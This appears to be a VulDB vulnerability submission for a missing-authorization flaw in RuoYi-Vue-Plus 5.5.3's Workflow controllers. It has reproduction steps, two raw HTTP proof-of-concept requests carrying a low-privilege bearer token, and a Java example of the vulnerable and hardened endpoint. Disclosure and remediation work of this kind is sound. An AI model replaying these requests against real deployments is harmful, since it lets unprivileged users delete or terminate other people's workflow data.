Submission #753321: Dromara RuoYi-Vue-Plus 5.5.3 Privilege Escalation

Title: Dromara RuoYi-Vue-Plus 5.5.3 Privilege Escalation
Description:

Dromara RuoYi-Vue-Plus v5.5.3 is vulnerable to Privilege Escalation in the Workflow module. The application fails to properly enforce object-level and function-level authorization checks on critical interfaces. Authenticated users with low privileges can bypass access controls to execute sensitive operations, such as deleting process instances, terminating tasks, and modifying task assignees, by directly invoking the API endpoints (e.g., /workflow/instance/deleteByInstanceIds). This issue stems from missing @SaCheckPermission annotations in FlwDefinitionController, FlwTaskController, and FlwInstanceController.

Vulnerability Type: CWE-862: Missing Authorization

Code:
https://gitee.com/dromara/RuoYi-Vue-Plus
http://github.com/dromara/RuoYi-Vue-Plus

Analysis:
The SaServletFilter in SecurityConfig.java only verifies login status but does not enforce specific permissions for the Workflow module. Critical controllers (FlwDefinitionController, FlwTaskController, FlwInstanceController) lack the @SaCheckPermission annotation on sensitive write operations.

Reproduction Steps:
1. Log in as a low-privileged user (no workflow admin rights) and obtain an authorization token.
2. Send a DELETE request to /workflow/instance/deleteByInstanceIds/ with the ID of a process instance created by an administrator.
3. The server responds with 200 OK, and the target instance is deleted, confirming the privilege escalation.

PoC (HTTP Requests):

Request 1 (listing workflow definitions as the low-privileged user):

GET /workflow/definition/list?pageNum=1&pageSize=10 HTTP/1.1
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJsb2dpblR5cGUiOiJsb2dpbiIsImxvZ2luSWQiOiJzeXNfdXNlcjo0Iiwicm5TdHIiOiJ2TVpVY2ZiYXlVM3g0THF4SVk3N2REUG5Xb244N0EyWCIsImNsaWVudGlkIjoiZTVjZDdlNDg5MWJmOTVkMWQxOTIwNmNlMjRhN2IzMmUiLCJ0ZW5hbnRJZCI6IjAwMDAwMCIsInVzZXJJZCI6NCwidXNlck5hbWUiOiJ0ZXN0MSIsImRlcHRJZCI6MTAyLCJkZXB0TmFtZSI6IumVv-aymeWIhuWFrOWPuCIsImRlcHRDYXRlZ29yeSI6IiJ9.OUatQncTnbJHil5EqkbXgYRpj2PFjG02gkDxOdDHsNM
Connection: keep-alive
Content-Language: zh_CN
Cookie: PUBLICCMS_ANALYTICS_ID=db35d5f9-5a97-4e31-9f4b-e4d65d94cb13; PUBLICCMS_ADMIN=1_967744fc-9de7-4e7e-a32c-78e26cca27bb
Host: localhost:8080
Referer: http://localhost/demo/tree
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
clientid: e5cd7e4891bf95d1d19206ce24a7b32e
sec-ch-ua: "Not(A:Brand";v="8", "Chromium";v="144", "Google Chrome";v="144"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"

Request 2 (terminating a task with the same low-privileged token):

POST /workflow/task/terminationTask HTTP/1.1
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJsb2dpblR5cGUiOiJsb2dpbiIsImxvZ2luSWQiOiJzeXNfdXNlcjo0Iiwicm5TdHIiOiJ2TVpVY2ZiYXlVM3g0THF4SVk3N2REUG5Xb244N0EyWCIsImNsaWVudGlkIjoiZTVjZDdlNDg5MWJmOTVkMWQxOTIwNmNlMjRhN2IzMmUiLCJ0ZW5hbnRJZCI6IjAwMDAwMCIsInVzZXJJZCI6NCwidXNlck5hbWUiOiJ0ZXN0MSIsImRlcHRJZCI6MTAyLCJkZXB0TmFtZSI6IumVv-aymeWIhuWFrOWPuCIsImRlcHRDYXRlZ29yeSI6IiJ9.OUatQncTnbJHil5EqkbXgYRpj2PFjG02gkDxOdDHsNM
Connection: keep-alive
Content-Language: zh_CN
Cookie: PUBLICCMS_ANALYTICS_ID=db35d5f9-5a97-4e31-9f4b-e4d65d94cb13; PUBLICCMS_ADMIN=1_967744fc-9de7-4e7e-a32c-78e26cca27bb
Host: localhost:8080
Referer: http://localhost/demo/tree
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
clientid: e5cd7e4891bf95d1d19206ce24a7b32e
sec-ch-ua: "Not(A:Brand";v="8", "Chromium";v="144", "Google Chrome";v="144"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Content-Type: application/json

{"taskId":1,"comment":"poc"}
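The root cause named above is a controller method that relies on the global login filter alone. The following Java is an added illustration, not code from the RuoYi-Vue-Plus repository: it shows the shape of the flaw beside a hardened form that adds both the function-level gate (@SaCheckPermission, which is real Sa-Token API) and an object-level ownership check. The package name, the FlwInstanceService interface, the permission codes and the second base path are assumptions made for the example.

```java
package org.dromara.workflow.controller; // package name assumed for the example

import cn.dev33.satoken.annotation.SaCheckPermission;
import cn.dev33.satoken.stp.StpUtil;
import org.springframework.http.ResponseEntity;
import org.springframework.web.bind.annotation.DeleteMapping;
import org.springframework.web.bind.annotation.PathVariable;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RestController;

import java.util.List;

/** Hypothetical service facade; the project's real service layer is not reproduced here. */
interface FlwInstanceService {
    /** True if the process instance was started by the given Sa-Token login id. */
    boolean isStartedBy(Long instanceId, String loginId);

    void deleteByInstanceIds(List<Long> instanceIds);
}

/**
 * Shape of the flaw the advisory describes: SaServletFilter has already confirmed
 * that the caller is logged in, but nothing asks whether this login may delete
 * process instances, so any authenticated user can delete any instance (CWE-862).
 * Registered under a separate base path only so both beans can coexist in one app.
 */
@RestController
@RequestMapping("/workflow/instance-vulnerable")
class FlwInstanceControllerVulnerable {
    private final FlwInstanceService service;

    FlwInstanceControllerVulnerable(FlwInstanceService service) {
        this.service = service;
    }

    @DeleteMapping("/deleteByInstanceIds/{instanceIds}")
    public ResponseEntity<Void> deleteByInstanceIds(@PathVariable List<Long> instanceIds) {
        service.deleteByInstanceIds(instanceIds); // no function-level or object-level check
        return ResponseEntity.ok().build();
    }
}

/** Hardened form: a function-level permission gate plus an object-level ownership check. */
@RestController
@RequestMapping("/workflow/instance")
class FlwInstanceControllerHardened {
    // Permission codes are assumptions; use the codes the deployment's role menu defines.
    static final String PERM_REMOVE_OWN = "workflow:instance:remove";
    static final String PERM_REMOVE_ANY = "workflow:instance:removeAny";

    private final FlwInstanceService service;

    FlwInstanceControllerHardened(FlwInstanceService service) {
        this.service = service;
    }

    // Function level: Sa-Token's annotation interceptor throws NotPermissionException
    // before the method body runs unless the current login holds the permission code.
    @SaCheckPermission(PERM_REMOVE_OWN)
    @DeleteMapping("/deleteByInstanceIds/{instanceIds}")
    public ResponseEntity<Void> deleteByInstanceIds(@PathVariable List<Long> instanceIds) {
        String loginId = StpUtil.getLoginIdAsString();
        for (Long id : instanceIds) {
            // Object level: a caller who did not start the instance needs the broader
            // permission; StpUtil.checkPermission throws if the login lacks it, so the
            // loop aborts before any deletion and nothing is removed on partial failure.
            if (!service.isStartedBy(id, loginId)) {
                StpUtil.checkPermission(PERM_REMOVE_ANY);
            }
        }
        service.deleteByInstanceIds(instanceIds);
        return ResponseEntity.ok().build();
    }
}
```

Two checks matter when applying this pattern. First, @SaCheckPermission is enforced only if Sa-Token's SaInterceptor (with annotation checking enabled) is registered in addition to the SaServletFilter; if SecurityConfig registers only the filter, the annotation is inert and the explicit StpUtil.checkPermission call inside the method is the one that takes effect. Second, the ownership check is what closes the object-level half of the finding: a function-level gate alone would still let any user holding the delete permission remove instances started by an administrator. Replaying the advisory's DELETE request with the low-privileged token after the change should yield the project's permission-denied error rather than 200 OK, which is a useful regression test to keep.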
User: feng123123 (UID 95215)
Submitted: 2026-02-06 10:30 (4 months ago)
Moderation: 2026-02-19 18:13 (13 days later)
Status: Accepted
VulDB Entry: 346944 [Dromara RuoYi-Vue-Plus up to 5.5.3 Workflow deleteByInstanceIds SaServletFilter privilege escalation]
Points: 17
